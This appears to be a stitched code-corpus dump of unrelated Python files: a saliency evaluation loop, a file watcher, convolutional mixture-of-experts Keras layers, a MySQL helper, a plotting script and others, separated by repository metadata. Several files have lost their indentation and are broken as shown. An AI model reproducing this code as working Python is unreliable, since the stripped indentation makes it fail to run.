all_count = -1
for i, sample in enumerate(val_loader):
if i < start_sample_size / batch_size:
continue
            for j in range(batch_size):  # iterate over the batch (mirrors the vis branch below)
sample_num += 1
if sample_num >= end_sample_size:
break
img_crop = sample["img_crop"][j]
uv_crop = sample["uv_crop"][j]
mask = sample["mask"][j]
mask = cv2.resize(mask.numpy().squeeze(), dsize=(256, 256))
for joint_number in range(21):
all_count += 1
path = os.path.join(f"{mode}SampleIG", f"{sample_num}", f"joint{joint_number}")
_dir = Path(path)
# grad_np = np.array([])
last = time.time()
grad_np = get_pose_integrated_gradient_no_vis(model, uv_crop, img_crop, joint_number)
if not _dir.exists():
# grad_np = get_pose_integrated_gradient(model, uv_crop, img_crop, joint_number, vis=False)
_dir.mkdir(parents=True)
with open(f'{path}/grad.pickle', 'wb') as f:
pickle.dump(grad_np, f)
# else:
# with open(f'{path}/grad.pickle', 'rb') as f:
# grad_np = pickle.load(f)
diffusion_val = get_diffusion(grad_np)
attention_val = get_attention(grad_np, mask)
diffusion.update(diffusion_val, 1)
attention.update(attention_val, 1)
bar.suffix = (
'({batch}/{size}) '
'diffusion: {diffusion:.4f} | '
'attention: {attention:.4f} | '
'time cost: {cost:.4f} | '
).format(
batch=all_count,
size=length,
diffusion=diffusion.avg,
attention=attention.avg,
cost=time.time() - last
)
bar.next()
if i > end_sample_size / batch_size + 1:
break
bar.finish()
else:
# Store the cropped image and corresponding heatmap
for i, sample in enumerate(val_loader):
if i < start_sample_size / batch_size:
continue
for j in range(batch_size):
sample_num = i * batch_size + j
if sample_num >= end_sample_size:
break
img_crop = sample["img_crop"][j]
uv_crop = sample["uv_crop"][j]
bar = Bar(f'\033[31m PIG_{sample_num} \033[0m', max=21)
for joint_number in range(21):
grad_np, pil = get_pose_integrated_gradient(model, uv_crop, img_crop, joint_number, vis=True)
path = os.path.join("sample", f"IG_{sample_num}_joint_{joint_number}")
if not os.path.exists(path):
os.mkdir(path)
pil.save(f"{path}/{mode}.jpg")
with open(f'{path}/{mode}_grad.pickle', 'wb') as f:
pickle.dump(grad_np, f)
bar.next()
bar.finish()
if i > end_sample_size / batch_size + 1:
break
| 1.867188
| 2
|
src/app.py
|
nthienan/watcher
| 0
|
12784821
|
<filename>src/app.py
import logging
import logging.handlers
import os
import time
import pyinotify
import functools
from subprocess import Popen, PIPE
def init_logger(cfg):
logger = logging.getLogger()
logger.setLevel(cfg.log_level)
formatter = logging.Formatter('%(asctime)s %(levelname)s - %(message)s')
console_handler = logging.StreamHandler()
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
file_handler = logging.handlers.RotatingFileHandler(
filename=cfg.log_file,
maxBytes=1250000,
backupCount=10)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
def run_cmd(*agrs, **keywords):
try:
logging.info("detected changes, command is running...")
logging.debug("cmd: %s" % keywords['cmd'])
p = Popen(keywords['cmd'], stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = p.communicate()
logging.debug("stdout: %s" % stdout)
logging.debug("stderr: %s" % stderr)
if stderr:
raise RuntimeError('an unexpected error occurred: %s' % stderr)
except Exception as err:
logging.error("%s" % err)
else:
logging.info("command has been run successfully")
class Application:
def __init__(self, opts, **cfg):
self.cfg = opts
self.is_running = False
init_logger(self.cfg)
self.wm = pyinotify.WatchManager()
mask = pyinotify.IN_CREATE | pyinotify.IN_DELETE | pyinotify.IN_CLOSE_WRITE | pyinotify.IN_MOVED_FROM | pyinotify.IN_MOVED_TO
self.wm.add_watch(self.cfg.watch_dir, mask, rec=True)
def run(self):
self.is_running = True
logging.info("watcher is running...")
try:
handler = functools.partial(run_cmd, cmd=self.cfg.cmd)
self.notifier = pyinotify.Notifier(self.wm)
self.notifier.loop(callback=handler)
except pyinotify.NotifierError as err:
logging.error('%s' % err)
def stop(self):
self.is_running = False
logging.info("watcher is stopping...")
self.notifier.stop()
logging.info("watcher stopped")
| 2.421875
| 2
|
src/Schema/src/schema.py
|
OakInn/protoargs
| 7
|
12784822
|
import sys
import schema_pa
class ArgsParser:
def parse(self, argv):
self.config = schema_pa.parse("schema",
"Test schema", argv)
if __name__ == "__main__":
parser = ArgsParser()
parser.parse(sys.argv[1:])
print(parser.config)
| 2.703125
| 3
|
src/493. Reverse Pairs.py
|
rajshrivastava/LeetCode
| 1
|
12784823
|
class Solution:
def reversePairs(self, nums: List[int]) -> int:
def merge(left, mid, right):
p1, p2 = left, mid+1
while p1 <= mid and p2 <=right:
if nums[p1] > nums[p2]*2:
self.count += mid-p1+1
p2+=1
else:
p1+=1
nums[left:right+1] = sorted(nums[left:right+1])
def merge_count(left, right):
if left >= right:
return
mid = left+(right-left)//2
merge_count(left, mid)
merge_count(mid+1, right)
merge(left, mid, right)
self.count = 0
merge_count(0, len(nums)-1)
return self.count
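# Illustrative check (not part of the original submission), using the well-known
# example for this problem: nums = [1, 3, 2, 3, 1] contains exactly 2 reverse pairs.
# Solution().reversePairs([1, 3, 2, 3, 1])  # -> 2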
| 3.453125
| 3
|
machinelearning-benchmark/dl/mixture-of-experts/ConvolutionalMoE.py
|
YyongXin/tf-mets
| 0
|
12784824
|
<reponame>YyongXin/tf-mets<filename>machinelearning-benchmark/dl/mixture-of-experts/ConvolutionalMoE.py
# -*- coding: utf-8 -*-
"""Convolutional MoE layers. The code here is based on the implementation of the standard convolutional layers in Keras.
"""
import numpy as np
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow.keras import activations, initializers, regularizers, constraints
from tensorflow.keras.initializers import RandomNormal
from tensorflow.keras.layers import Layer, InputSpec
from tensorflow.python.keras.utils import conv_utils
# FIXME: In tf2.0, this API is updated.
#from keras.utils import conv_utils
class _ConvMoE(Layer):
"""Abstract nD convolution layer mixture of experts (private, used as implementation base).
"""
def __init__(self, rank,
n_filters,
n_experts_per_filter,
kernel_size,
strides=1,
padding='valid',
data_format='channels_last',
dilation_rate=1,
expert_activation=None,
gating_activation=None,
use_expert_bias=True,
use_gating_bias=True,
expert_kernel_initializer_scale=1.0,
gating_kernel_initializer_scale=1.0,
expert_bias_initializer='zeros',
gating_bias_initializer='zeros',
expert_kernel_regularizer=None,
gating_kernel_regularizer=None,
expert_bias_regularizer=None,
gating_bias_regularizer=None,
expert_kernel_constraint=None,
gating_kernel_constraint=None,
expert_bias_constraint=None,
gating_bias_constraint=None,
activity_regularizer=None,
**kwargs):
super(_ConvMoE, self).__init__(**kwargs)
self.rank = rank
self.n_filters = n_filters
self.n_experts_per_filter = n_experts_per_filter
self.n_total_filters = self.n_filters * self.n_experts_per_filter
self.kernel_size = conv_utils.normalize_tuple(kernel_size, rank, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
self.data_format = conv_utils.normalize_data_format(data_format)
self.dilation_rate = conv_utils.normalize_tuple(dilation_rate, rank, 'dilation_rate')
self.expert_activation = activations.get(expert_activation)
self.gating_activation = activations.get(gating_activation)
self.use_expert_bias = use_expert_bias
self.use_gating_bias = use_gating_bias
self.expert_kernel_initializer_scale = expert_kernel_initializer_scale
self.gating_kernel_initializer_scale = gating_kernel_initializer_scale
self.expert_bias_initializer = initializers.get(expert_bias_initializer)
self.gating_bias_initializer = initializers.get(gating_bias_initializer)
self.expert_kernel_regularizer = regularizers.get(expert_kernel_regularizer)
self.gating_kernel_regularizer = regularizers.get(gating_kernel_regularizer)
self.expert_bias_regularizer = regularizers.get(expert_bias_regularizer)
self.gating_bias_regularizer = regularizers.get(gating_bias_regularizer)
self.expert_kernel_constraint = constraints.get(expert_kernel_constraint)
self.gating_kernel_constraint = constraints.get(gating_kernel_constraint)
self.expert_bias_constraint = constraints.get(expert_bias_constraint)
self.gating_bias_constraint = constraints.get(gating_bias_constraint)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.input_spec = InputSpec(ndim=self.rank + 2)
def build(self, input_shape):
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape[channel_axis] is None:
raise ValueError('The channel dimension of the inputs should be defined. Found `None`.')
input_dim = input_shape[channel_axis]
expert_init_std = self.expert_kernel_initializer_scale / np.sqrt(input_dim*np.prod(self.kernel_size))
gating_init_std = self.gating_kernel_initializer_scale / np.sqrt(np.prod(input_shape[1:]))
expert_kernel_shape = self.kernel_size + (input_dim, self.n_total_filters)
self.expert_kernel = self.add_weight(shape=expert_kernel_shape,
initializer=RandomNormal(mean=0., stddev=expert_init_std),
name='expert_kernel',
regularizer=self.expert_kernel_regularizer,
constraint=self.expert_kernel_constraint)
gating_kernel_shape = input_shape[1:] + (self.n_filters, self.n_experts_per_filter)
self.gating_kernel = self.add_weight(shape=gating_kernel_shape,
initializer=RandomNormal(mean=0., stddev=gating_init_std),
name='gating_kernel',
regularizer=self.gating_kernel_regularizer,
constraint=self.gating_kernel_constraint)
if self.use_expert_bias:
expert_bias_shape = ()
for i in range(self.rank):
expert_bias_shape = expert_bias_shape + (1,)
expert_bias_shape = expert_bias_shape + (self.n_filters, self.n_experts_per_filter)
self.expert_bias = self.add_weight(shape=expert_bias_shape,
initializer=self.expert_bias_initializer,
name='expert_bias',
regularizer=self.expert_bias_regularizer,
constraint=self.expert_bias_constraint)
else:
self.expert_bias = None
if self.use_gating_bias:
self.gating_bias = self.add_weight(shape=(self.n_filters, self.n_experts_per_filter),
initializer=self.gating_bias_initializer,
name='gating_bias',
regularizer=self.gating_bias_regularizer,
constraint=self.gating_bias_constraint)
else:
self.gating_bias = None
self.o_shape = self.compute_output_shape(input_shape=input_shape)
self.new_gating_outputs_shape = (-1,)
for i in range(self.rank):
self.new_gating_outputs_shape = self.new_gating_outputs_shape + (1,)
self.new_gating_outputs_shape = self.new_gating_outputs_shape + (self.n_filters, self.n_experts_per_filter)
# Set input spec.
self.input_spec = InputSpec(ndim=self.rank + 2, axes={channel_axis: input_dim})
self.built = True
def call(self, inputs):
if self.rank == 1:
expert_outputs = K.conv1d(
inputs,
self.expert_kernel,
strides=self.strides[0],
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate[0])
if self.rank == 2:
expert_outputs = K.conv2d(
inputs,
self.expert_kernel,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate)
if self.rank == 3:
expert_outputs = K.conv3d(
inputs,
self.expert_kernel,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate)
expert_outputs = K.reshape(expert_outputs, (-1,) + self.o_shape[1:-1] + (self.n_filters, self.n_experts_per_filter))
if self.use_expert_bias:
expert_outputs = K.bias_add(
expert_outputs,
self.expert_bias,
data_format=self.data_format)
if self.expert_activation is not None:
expert_outputs = self.expert_activation(expert_outputs)
gating_outputs = tf.tensordot(inputs, self.gating_kernel, axes=self.rank+1) # samples x n_filters x n_experts_per_filter
if self.use_gating_bias:
gating_outputs = K.bias_add(
gating_outputs,
self.gating_bias,
data_format=self.data_format)
if self.gating_activation is not None:
gating_outputs = self.gating_activation(gating_outputs)
gating_outputs = K.reshape(gating_outputs, self.new_gating_outputs_shape)
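        # weight each expert's response by its gate and sum out the expert axis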
outputs = K.sum(expert_outputs * gating_outputs, axis=-1, keepdims=False)
return outputs
def compute_output_shape(self, input_shape):
if self.data_format == 'channels_last':
space = input_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return (input_shape[0],) + tuple(new_space) + (self.n_filters,)
if self.data_format == 'channels_first':
space = input_shape[2:]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return (input_shape[0], self.n_filters) + tuple(new_space)
def get_config(self):
config = {
'rank': self.rank,
'n_filters': self.n_filters,
            'n_experts_per_filter': self.n_experts_per_filter,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'expert_activation': activations.serialize(self.expert_activation),
'gating_activation': activations.serialize(self.gating_activation),
'use_expert_bias': self.use_expert_bias,
'use_gating_bias': self.use_gating_bias,
'expert_kernel_initializer_scale':self.expert_kernel_initializer_scale,
'gating_kernel_initializer_scale':self.gating_kernel_initializer_scale,
'expert_bias_initializer': initializers.serialize(self.expert_bias_initializer),
'gating_bias_initializer': initializers.serialize(self.gating_bias_initializer),
'expert_kernel_regularizer': regularizers.serialize(self.expert_kernel_regularizer),
'gating_kernel_regularizer': regularizers.serialize(self.gating_kernel_regularizer),
'expert_bias_regularizer': regularizers.serialize(self.expert_bias_regularizer),
'gating_bias_regularizer': regularizers.serialize(self.gating_bias_regularizer),
'expert_kernel_constraint': constraints.serialize(self.expert_kernel_constraint),
'gating_kernel_constraint': constraints.serialize(self.gating_kernel_constraint),
'expert_bias_constraint': constraints.serialize(self.expert_bias_constraint),
'gating_bias_constraint': constraints.serialize(self.gating_bias_constraint),
'activity_regularizer': regularizers.serialize(self.activity_regularizer)
}
base_config = super(_ConvMoE, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Conv1DMoE(_ConvMoE):
"""1D convolution layer (e.g. temporal convolution).
# Input shape
3D tensor with shape: `(batch_size, steps, input_dim)`
# Output shape
3D tensor with shape: `(batch_size, new_steps, n_filters)`
`steps` value might have changed due to padding or strides.
"""
def __init__(self,
n_filters,
n_experts_per_filter,
kernel_size,
strides=1,
padding='valid',
data_format='channels_last',
dilation_rate=1,
expert_activation=None,
gating_activation=None,
use_expert_bias=True,
use_gating_bias=True,
expert_kernel_initializer_scale=1.0,
gating_kernel_initializer_scale=1.0,
expert_bias_initializer='zeros',
gating_bias_initializer='zeros',
expert_kernel_regularizer=None,
gating_kernel_regularizer=None,
expert_bias_regularizer=None,
gating_bias_regularizer=None,
expert_kernel_constraint=None,
gating_kernel_constraint=None,
expert_bias_constraint=None,
gating_bias_constraint=None,
activity_regularizer=None,
**kwargs):
if padding == 'causal':
if data_format != 'channels_last':
raise ValueError('When using causal padding in `Conv1DMoE`, `data_format` must be "channels_last" (temporal data).')
super(Conv1DMoE, self).__init__(
rank=1,
n_filters=n_filters,
n_experts_per_filter=n_experts_per_filter,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
expert_activation=expert_activation,
gating_activation=gating_activation,
use_expert_bias=use_expert_bias,
use_gating_bias=use_gating_bias,
expert_kernel_initializer_scale=expert_kernel_initializer_scale,
gating_kernel_initializer_scale=gating_kernel_initializer_scale,
expert_bias_initializer=expert_bias_initializer,
gating_bias_initializer=gating_bias_initializer,
expert_kernel_regularizer=expert_kernel_regularizer,
gating_kernel_regularizer=gating_kernel_regularizer,
expert_bias_regularizer=expert_bias_regularizer,
gating_bias_regularizer=gating_bias_regularizer,
expert_kernel_constraint=expert_kernel_constraint,
gating_kernel_constraint=gating_kernel_constraint,
expert_bias_constraint=expert_bias_constraint,
gating_bias_constraint=gating_bias_constraint,
activity_regularizer=activity_regularizer,
**kwargs)
self.input_spec = InputSpec(ndim=3)
def get_config(self):
config = super(Conv1DMoE, self).get_config()
config.pop('rank')
return config
class Conv2DMoE(_ConvMoE):
"""2D convolution layer (e.g. spatial convolution over images).
# Input shape
4D tensor with shape:
`(samples, channels, rows, cols)`
if `data_format` is `"channels_first"`
or 4D tensor with shape:
`(samples, rows, cols, channels)`
if `data_format` is `"channels_last"`.
# Output shape
4D tensor with shape:
`(samples, n_filters, new_rows, new_cols)`
if `data_format` is `"channels_first"`
or 4D tensor with shape:
`(samples, new_rows, new_cols, n_filters)`
if `data_format` is `"channels_last"`.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
n_filters,
n_experts_per_filter,
kernel_size,
strides=(1,1),
padding='valid',
data_format='channels_last',
dilation_rate=(1,1),
expert_activation=None,
gating_activation=None,
use_expert_bias=True,
use_gating_bias=True,
expert_kernel_initializer_scale=1.0,
gating_kernel_initializer_scale=1.0,
expert_bias_initializer='zeros',
gating_bias_initializer='zeros',
expert_kernel_regularizer=None,
gating_kernel_regularizer=None,
expert_bias_regularizer=None,
gating_bias_regularizer=None,
expert_kernel_constraint=None,
gating_kernel_constraint=None,
expert_bias_constraint=None,
gating_bias_constraint=None,
activity_regularizer=None,
**kwargs):
super(Conv2DMoE, self).__init__(
rank=2,
n_filters=n_filters,
n_experts_per_filter=n_experts_per_filter,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
expert_activation=expert_activation,
gating_activation=gating_activation,
use_expert_bias=use_expert_bias,
use_gating_bias=use_gating_bias,
expert_kernel_initializer_scale=expert_kernel_initializer_scale,
gating_kernel_initializer_scale=gating_kernel_initializer_scale,
expert_bias_initializer=expert_bias_initializer,
gating_bias_initializer=gating_bias_initializer,
expert_kernel_regularizer=expert_kernel_regularizer,
gating_kernel_regularizer=gating_kernel_regularizer,
expert_bias_regularizer=expert_bias_regularizer,
gating_bias_regularizer=gating_bias_regularizer,
expert_kernel_constraint=expert_kernel_constraint,
gating_kernel_constraint=gating_kernel_constraint,
expert_bias_constraint=expert_bias_constraint,
gating_bias_constraint=gating_bias_constraint,
activity_regularizer=activity_regularizer,
**kwargs)
self.input_spec = InputSpec(ndim=4)
def get_config(self):
config = super(Conv2DMoE, self).get_config()
config.pop('rank')
return config
class Conv3DMoE(_ConvMoE):
"""3D convolution layer (e.g. spatial convolution over volumes).
# Input shape
5D tensor with shape:
`(samples, channels, conv_dim1, conv_dim2, conv_dim3)`
if `data_format` is `"channels_first"`
or 5D tensor with shape:
`(samples, conv_dim1, conv_dim2, conv_dim3, channels)`
if `data_format` is `"channels_last"`.
# Output shape
5D tensor with shape:
`(samples, n_filters, new_conv_dim1, new_conv_dim2, new_conv_dim3)`
if `data_format` is `"channels_first"`
or 5D tensor with shape:
`(samples, new_conv_dim1, new_conv_dim2, new_conv_dim3, n_filters)`
if `data_format` is `"channels_last"`.
`new_conv_dim1`, `new_conv_dim2` and `new_conv_dim3` values might have changed due to padding.
"""
def __init__(self,
n_filters,
n_experts_per_filter,
kernel_size,
strides=(1,1,1),
padding='valid',
data_format='channels_last',
dilation_rate=(1,1,1),
expert_activation=None,
gating_activation=None,
use_expert_bias=True,
use_gating_bias=True,
expert_kernel_initializer_scale=1.0,
gating_kernel_initializer_scale=1.0,
expert_bias_initializer='zeros',
gating_bias_initializer='zeros',
expert_kernel_regularizer=None,
gating_kernel_regularizer=None,
expert_bias_regularizer=None,
gating_bias_regularizer=None,
expert_kernel_constraint=None,
gating_kernel_constraint=None,
expert_bias_constraint=None,
gating_bias_constraint=None,
activity_regularizer=None,
**kwargs):
super(Conv3DMoE, self).__init__(
rank=3,
n_filters=n_filters,
n_experts_per_filter=n_experts_per_filter,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
expert_activation=expert_activation,
gating_activation=gating_activation,
use_expert_bias=use_expert_bias,
use_gating_bias=use_gating_bias,
expert_kernel_initializer_scale=expert_kernel_initializer_scale,
gating_kernel_initializer_scale=gating_kernel_initializer_scale,
expert_bias_initializer=expert_bias_initializer,
gating_bias_initializer=gating_bias_initializer,
expert_kernel_regularizer=expert_kernel_regularizer,
gating_kernel_regularizer=gating_kernel_regularizer,
expert_bias_regularizer=expert_bias_regularizer,
gating_bias_regularizer=gating_bias_regularizer,
expert_kernel_constraint=expert_kernel_constraint,
gating_kernel_constraint=gating_kernel_constraint,
expert_bias_constraint=expert_bias_constraint,
gating_bias_constraint=gating_bias_constraint,
activity_regularizer=activity_regularizer,
**kwargs)
self.input_spec = InputSpec(ndim=5)
def get_config(self):
config = super(Conv3DMoE, self).get_config()
config.pop('rank')
return config
# Aliases
Convolution1DMoE = Conv1DMoE
Convolution2DMoE = Conv2DMoE
Convolution3DMoE = Conv3DMoE
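# A minimal usage sketch (illustrative only, not part of the original module); the
# model topology and input shape below are assumptions chosen just to show the API.
#
# from tensorflow.keras import Sequential
# from tensorflow.keras.layers import Flatten, Dense
#
# model = Sequential([
#     Conv2DMoE(n_filters=16, n_experts_per_filter=4, kernel_size=3,
#               expert_activation='relu', gating_activation='softmax',
#               input_shape=(28, 28, 1)),
#     Flatten(),
#     Dense(10, activation='softmax'),
# ])
# model.compile(optimizer='adam', loss='sparse_categorical_crossentropy')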
| 2.265625
| 2
|
c.ppy.sh/databaseHelper.py
|
Kreyren/ripple
| 53
|
12784825
|
<gh_stars>10-100
import pymysql
import bcolors
import consoleHelper
import threading
class db:
"""A MySQL database connection"""
connection = None
disconnected = False
pingTime = 600
def __init__(self, __host, __username, __password, __database, __pingTime = 600):
"""
Connect to MySQL database
__host -- MySQL host name
__username -- MySQL username
__password -- <PASSWORD>
__database -- MySQL database name
__pingTime -- MySQL database ping time (default: 600)
"""
self.connection = pymysql.connect(host=__host, user=__username, password=__password, db=__database, cursorclass=pymysql.cursors.DictCursor, autocommit=True)
self.pingTime = __pingTime
self.pingLoop()
def bindParams(self, __query, __params):
"""
Replace every ? with the respective **escaped** parameter in array
__query -- query with ?s
__params -- array with params
return -- new query
"""
for i in __params:
escaped = self.connection.escape(i)
__query = __query.replace("?", str(escaped), 1)
return __query
def execute(self, __query, __params = None):
"""
Execute a SQL query
__query -- query, can contain ?s
__params -- array with params. Optional
"""
with self.connection.cursor() as cursor:
try:
# Bind params if needed
if __params != None:
__query = self.bindParams(__query, __params)
# Execute the query
cursor.execute(__query)
finally:
# Close this connection
cursor.close()
def fetch(self, __query, __params = None, __all = False):
"""
Fetch the first (or all) element(s) of SQL query result
__query -- query, can contain ?s
__params -- array with params. Optional
__all -- if true, will fetch all values. Same as fetchAll
return -- dictionary with result data or False if failed
"""
with self.connection.cursor() as cursor:
try:
# Bind params if needed
if __params != None:
__query = self.bindParams(__query, __params)
# Execute the query with binded params
cursor.execute(__query)
# Get first result and return it
if __all == False:
return cursor.fetchone()
else:
return cursor.fetchall()
finally:
# Close this connection
cursor.close()
def fetchAll(self, __query, __params = None):
"""
Fetch the all elements of SQL query result
__query -- query, can contain ?s
__params -- array with params. Optional
return -- dictionary with result data
"""
return self.fetch(__query, __params, True)
def pingLoop(self):
"""
Pings MySQL server. We need to ping/execute a query at least once every 8 hours
or the connection will die.
        If called once, it reschedules itself every pingTime seconds (600 by default), forever
CALL THIS FUNCTION ONLY ONCE!
"""
# Default loop time
time = self.pingTime
# Make sure the connection is alive
try:
# Try to ping and reconnect if not connected
self.connection.ping()
if self.disconnected == True:
# If we were disconnected, set disconnected to false and print message
self.disconnected = False
consoleHelper.printColored("> Reconnected to MySQL server!", bcolors.GREEN)
except:
# Can't ping MySQL server. Show error and call loop in 5 seconds
consoleHelper.printColored("[!] CRITICAL!! MySQL connection died! Make sure your MySQL server is running! Checking again in 5 seconds...", bcolors.RED)
self.disconnected = True
time = 5
# Schedule a new check (endless loop)
threading.Timer(time, self.pingLoop).start()
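# Example usage (illustrative only; the credentials and queries below are placeholders):
#
# database = db("localhost", "ripple_user", "secret", "ripple")
# database.execute("UPDATE users SET username = ? WHERE id = ?", ["foo", 1000])
# row = database.fetch("SELECT * FROM users WHERE id = ?", [1000])
# rows = database.fetchAll("SELECT * FROM users")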
| 2.953125
| 3
|
tests/cases/stats/tests/__init__.py
|
murphyke/avocado
| 0
|
12784826
|
from .agg import *
from .kmeans import *
| 1.039063
| 1
|
Professor_Dados/Core/views.py
|
Francisco-Carlos/Site-Professor
| 1
|
12784827
|
from django.shortcuts import render, redirect, get_object_or_404
from .models import Conteudos
from django.contrib.auth.models import User,auth
from pytube import YouTube
# Create your views here.
def Index(request):
arquivo = Conteudos.objects.all()
dados = {'arquivo':arquivo}
return render(request,'index.html',dados)
def Dados(request):
arquivos = Conteudos.objects.all()
dados = {'arquivos':arquivos}
return render(request,'Conteudos.html',dados)
def Login(request):
if request.method == 'POST':
email = request.POST['email']
senha = request.POST['senha']
if email == '' or senha == '':
return redirect('login')
if User.objects.filter(email=email).exists():
nome = User.objects.filter(email=email).values_list('username',flat=True).get()
user = auth.authenticate(request,username=nome,password=<PASSWORD>)
if user is not None:
auth.login(request,user)
return redirect('dashbord')
else:
return render(request,'Login.html')
def Sair(request):
auth.logout(request)
return redirect('index')
def Cadastrar(request):
if request.method == 'POST':
nome = request.POST['nome']
email = request.POST['email']
senha_1 = request.POST['senha']
senha_2 = request.POST['senha_2']
        if not nome.strip():
            return redirect('cadastrar')
        if not email.strip():
            return redirect('cadastrar')
        if senha_1 != senha_2:
            return redirect('cadastrar')
if User.objects.filter(email=email).exists():
return redirect('cadastrar')
user = User.objects.create_user(username=nome,email=email,password=<PASSWORD>)
user.save()
return redirect('login')
else:
return render(request,'Cadastrar.html')
def Deletar(request,id):
arq = Conteudos.objects.get(id=id)
arq.delete()
return redirect('dashbord')
def Dashbord(request):
if request.user.is_authenticated:
id = request.user.id
arqui = Conteudos.objects.all().filter(Criador=id)
dados = {'arqui':arqui}
return render(request,'Dashbord.html',dados)
else:
return redirect('Index')
def Criar(request):
if request.method == 'POST':
titulo = request.POST['titulo']
descri = request.POST['descricao']
arqui = request.FILES['arquivo']
user = get_object_or_404(User,pk=request.user.id)
conte = Conteudos.objects.create(Criador=user,Nome=titulo,Conteudo=descri,Arquivo=arqui)
conte.save()
return redirect('dashbord')
else:
return render(request,'Dashbord.html')
def Baixar(request):
if request.method == 'POST':
link = request.POST['link']
caminho = request.POST['caminho']
yt = YouTube(link)
mensagen =' sucesso'
ys = yt.streams.filter(res="360p").first()
ys.download(caminho)
baixar = {'mensagen':mensagen}
return render(request,'Baixar.html',baixar)
else:
return render(request,'Baixar.html')
| 2.390625
| 2
|
indra/indra.py
|
Madjura/text-entailment
| 0
|
12784828
|
<filename>indra/indra.py
import time
import requests
import json
from requests import HTTPError
from urllib3.exceptions import MaxRetryError, NewConnectionError
"""
pairs = [
{'t1': 'house', 't2': 'beer'},
{'t1': 'car', 't2': 'engine'}]
data = {'corpus': 'googlenews',
'model': 'W2V',
'language': 'EN',
'scoreFunction': 'COSINE', 'pairs': pairs}
headers = {
'content-type': "application/json"
}
res = requests.post("http://localhost:8916/relatedness", data=json.dumps(data), headers=headers)
res.raise_for_status()
print(res.json())
"""
def check_relatedness(t1, t2):
if "#" in t1:
t1 = " ".join(t1.split("#")[1].split("_"))
pairs = [
{"t1": t1, "t2": t2}
]
data = {'corpus': 'googlenews',
'model': 'W2V',
'language': 'EN',
'scoreFunction': 'COSINE', 'pairs': pairs}
headers = {
'content-type': "application/json"
}
res = requests.post("http://localhost:8916/relatedness", data=json.dumps(data), headers=headers)
res.raise_for_status()
j = res.json()
return j["pairs"][0]["score"]
def check_relatedness_pairs(pairs):
p = []
for t1, t2 in pairs:
p.append({"t1": t1, "t2": t2})
data = {'corpus': 'googlenews',
'model': 'W2V',
'language': 'EN',
'scoreFunction': 'COSINE', 'pairs': p}
headers = {
'content-type': "application/json"
}
f = False
try:
res = requests.post("http://localhost:8916/relatedness", data=json.dumps(data), headers=headers)
except (ConnectionError, requests.exceptions.ConnectionError, MaxRetryError, NewConnectionError):
time.sleep(5)
print("---ERROR IN INDRA, TRYING AGAIN---")
res = requests.post("http://localhost:8916/relatedness", data=json.dumps(data), headers=headers)
if f:
print("---BLANK---")
return {}
try:
res.raise_for_status()
except HTTPError:
        return {}  # request failed somehow; give up and return an empty result
try:
j = res.json()["pairs"]
except KeyError:
j = {}
dd = {}
for d in j:
t1 = d["t1"]
t2 = d["t2"]
dd[(t1, t2)] = d["score"]
return dd
# print(check_relatedness("picture", "for taking photographs"))
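# Illustrative batched call (assumes the same local Indra endpoint as above); the
# result is a dict keyed by (t1, t2) pairs:
# check_relatedness_pairs([("house", "beer"), ("car", "engine")])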
| 2.53125
| 3
|
lib/SurfacingAlgorithms/huji-rich-Elad3DFast/visualisation/two_dimensional/python/hdf5_voronoi_plot.py
|
GalaxyHunters/Vivid
| 0
|
12784829
|
<gh_stars>0
import h5py
import pylab
import numpy
import matplotlib
import sys
import argparse
parser = argparse.ArgumentParser(description='Displays a snapshot of the hydrodynamic simulation')
parser.add_argument("file_name",
help="path to snapshot file")
parser.add_argument("field",
help="Name of hydrodynamic variable")
args = parser.parse_args()
h5f = h5py.File(args.file_name, 'r')
x_list = numpy.array(h5f['x_coordinate'])
print(len(x_list))
y_list = h5f['y_coordinate']
z_list = h5f[args.field]
vert_x_raw = numpy.array(h5f['x position of vertices'])
vert_y_raw = numpy.array(h5f['y position of vertices'])
vert_n_raw = h5f['Number of vertices in cell']
vert_idx_list = numpy.cumsum(vert_n_raw)
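# vert_idx_list[i] marks where the i-th cell's vertices end in the flattened vertex arrays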
z_range = max(z_list) - min(z_list) + 1e-15
z_min = min(z_list)
z_scaled = [(z-z_min)/z_range for z in z_list]
for i in range(len(vert_n_raw)):
upbound = vert_idx_list[i]
if i==0:
lowbound = 0
else:
lowbound = vert_idx_list[i-1]
pylab.fill(vert_x_raw[lowbound:upbound],
vert_y_raw[lowbound:upbound],
fc=matplotlib.cm.jet(z_scaled[i]),
ec='None')
pylab.title(args.field)
ax, _ = matplotlib.colorbar.make_axes(pylab.gca())
matplotlib.colorbar.ColorbarBase(ax,norm=matplotlib.colors.Normalize(vmin=min(z_list),vmax=max(z_list)))
pylab.show()
| 2.09375
| 2
|
src/workers/dialer.py
|
Macsnow14/Thrive-voice
| 0
|
12784830
|
<reponame>Macsnow14/Thrive-voice
# -*- coding: utf-8 -*-
# @Author: Macsnow
# @Date: 2017-05-15 15:14:46
# @Last Modified by: Macsnow
# @Last Modified time: 2017-05-19 16:17:19
import socket
from src.workers.base_worker import BaseWorker
class Dialer(BaseWorker):
